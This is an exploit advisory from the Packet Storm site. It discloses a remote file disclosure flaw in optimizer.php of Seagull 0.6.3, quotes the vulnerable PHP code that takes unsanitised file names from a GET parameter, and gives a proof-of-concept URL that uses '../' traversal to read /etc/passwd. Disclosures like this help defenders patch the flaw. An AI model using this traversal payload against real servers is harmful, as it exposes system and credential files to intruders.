Seagull STABLE version 0.6.3 suffers from a remote file disclosure vulnerability.
15fe65a7540d16bc083d79d4dcf1378180302cf4b1f8cef9cfe4a5e26b5827df __fuzion___ ____
______/ \__// \__/____\
_/ \_/ : //____\\
/| : : .. / \
| | :: :: \ /
| | :| || \ \______/
| | || || |\ / |
\| || || | / | \
| || || | / /_\ \
| ___ || ___ || | / / \
\_-_/ \_-_/ | ____ |/__/ \
_\_--_/ \ /
/____ /
/ \ /
\______\_________/
Product:
Seagull STABLE 0.6.3
http://seagullproject.org/
Vulnerable:
optimizer.php; line 61
// get files and it's mod time
if (!empty($_GET['files'])) {
$filesString = $_GET['files'];
$aFiles = explode(',', $_GET['files']);
foreach ($aFiles as $fileName) {
if (is_file($jsFile = dirname(__FILE__) . '/' . $fileName)) {
$this->aFiles[] = $jsFile;
$lastMod = max($lastMod, filemtime($jsFile));
PoC:
http://pentest.localhost/seagull-0.6.3/www/optimizer.php?files=../../../../../../../../etc/passwd
Greetings to:
d3hydr8, whoami, beenu, kasi, MosDef, etc
Everyone at darkc0de.com & rootmybox.org
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed